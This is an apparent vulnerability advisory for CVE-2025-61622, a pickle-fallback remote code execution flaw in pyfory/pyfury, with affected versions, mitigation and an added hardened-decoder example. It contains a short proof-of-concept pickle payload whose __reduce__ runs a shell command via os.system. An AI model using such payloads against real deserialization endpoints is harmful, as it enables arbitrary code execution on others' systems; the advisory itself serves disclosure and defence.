Critical | CVSS 9.8 | RCE | CVE-2025-61622

Published 2025

Python RCE via Unguarded Pickle Fallback in pyfory/pyfury

BugBunny.ai identified a critical deserialization issue in Apache Fory's Python modules (pyfory/pyfury) where unsupported object types fall back to Python's unsafe pickle loader. Crafted data streams from untrusted sources force the pickle fallback, enabling arbitrary code execution.


Summary

Impact: Arbitrary code execution on deserialization
Vector: Crafted pyfory stream with pickle payload
Affected: pyfory 0.1.0–0.10.3, 0.12.0–0.12.2
Status: Fixed in pyfory 0.10.4, 0.12.3+

Root Cause

When pyfory encounters an object type it doesn't recognize, it falls back to Python's native pickle deserializer. Since pickle can execute arbitrary Python code during deserialization, an attacker can craft a data stream that triggers this fallback with a malicious pickle payload.

Proof of Concept

```python
import base64, pickle


class RCE:
    def __reduce__(self):
        return (__import__('os').system, ('touch /tmp/bugbunny-owned',))


print(base64.b64encode(pickle.dumps(RCE())).decode())
# Embed the base64 output in the pyfory stream so the fallback deserializer feeds it to pickle.loads.
```

Mitigation

  • Upgrade to pyfory 0.10.4 or 0.12.3+ immediately
  • Never deserialize pyfory streams from untrusted sources
  • Implement input validation before deserialization
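The following is an added example, not pyfory's code, written to make the root cause and the mitigation concrete side by side. It models the vulnerable pattern with a toy tagged stream (one tag byte followed by the payload; that layout is an assumption, not pyfory's wire format): the unguarded decoder hands any unrecognised tag to `pickle.loads`, while the hardened decoder fails closed on unknown tags, and a `RestrictedUnpickler` (the allow-list pattern from the Python `pickle` documentation) shows the fallback position if pickle cannot be removed entirely. The "hostile" object's `__reduce__` invokes `os.getpid`, a harmless placeholder standing in for `os.system`, so the test can observe that a callable ran.

```python
"""Toy tagged-stream decoder contrasting an unguarded pickle fallback with
two hardened alternatives. Constructed example; the tag layout is assumed."""
import io
import os
import pickle
import struct

TAG_INT = 0x01     # payload: big-endian signed 64-bit integer
TAG_STR = 0x02     # payload: UTF-8 bytes
TAG_PICKLE = 0xFF  # payload: raw pickle bytes (the "unsupported type" fallback)


class UnsupportedTypeError(ValueError):
    """Raised by the hardened decoder instead of handing bytes to pickle."""


def encode(obj) -> bytes:
    """Encode int/str natively; anything else goes through the risky pickle path."""
    if isinstance(obj, bool):
        raise TypeError("bool is not part of this toy format")
    if isinstance(obj, int):
        return bytes([TAG_INT]) + struct.pack(">q", obj)
    if isinstance(obj, str):
        return bytes([TAG_STR]) + obj.encode("utf-8")
    return bytes([TAG_PICKLE]) + pickle.dumps(obj)


def _decode_native(tag: int, payload: bytes):
    """Return the decoded value for a known tag, or None for an unknown one."""
    if tag == TAG_INT:
        return struct.unpack(">q", payload)[0]
    if tag == TAG_STR:
        return payload.decode("utf-8")
    return None


def decode_vulnerable(stream: bytes):
    """Mirrors the root cause: unknown tag -> pickle.loads on attacker-controlled bytes."""
    tag, payload = stream[0], stream[1:]
    native = _decode_native(tag, payload)
    if native is not None:
        return native
    return pickle.loads(payload)  # runs whatever callable __reduce__ named


def decode_hardened(stream: bytes):
    """Fail closed: an unknown tag is an error, never a pickle fallback."""
    tag, payload = stream[0], stream[1:]
    native = _decode_native(tag, payload)
    if native is None:
        raise UnsupportedTypeError(f"tag 0x{tag:02x} is not a supported type")
    return native


class RestrictedUnpickler(pickle.Unpickler):
    """If pickle truly cannot be avoided, resolve only an explicit allow-list of globals."""
    ALLOWED = {("builtins", n) for n in
               ("list", "dict", "set", "frozenset", "tuple", "int", "str", "bytes")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallOnLoad:
    """Constructed stand-in for a hostile object: unpickling it calls os.getpid()."""
    def __reduce__(self):
        return (os.getpid, ())


def demo() -> dict:
    """Exercise all three decoders on a benign and a hostile stream."""
    benign = encode("hello")
    hostile = encode(CallOnLoad())  # TAG_PICKLE + pickle that invokes a callable on load
    results = {
        "benign_vuln": decode_vulnerable(benign),
        "benign_hardened": decode_hardened(benign),
        "hostile_vuln_ran_callable": decode_vulnerable(hostile) == os.getpid(),
    }
    try:
        decode_hardened(hostile)
        results["hostile_hardened_blocked"] = False
    except UnsupportedTypeError:
        results["hostile_hardened_blocked"] = True
    try:
        restricted_loads(hostile[1:])
        results["restricted_blocked"] = False
    except pickle.UnpicklingError:
        results["restricted_blocked"] = True
    results["restricted_allows_plain"] = (
        restricted_loads(pickle.dumps([1, {"a": 2}])) == [1, {"a": 2}])
    return results


if __name__ == "__main__":
    print(demo())
```

The point of contrast is `decode_vulnerable` versus `decode_hardened`: both decode the same native tags, but only the former silently routes anything it does not understand to pickle. The allow-list unpickler is a defence-in-depth layer, not a substitute; the upgrade and the "never deserialize untrusted streams" rule above remain the primary controls.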

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Apache Fory maintainers.

Reporter: BugBunny.ai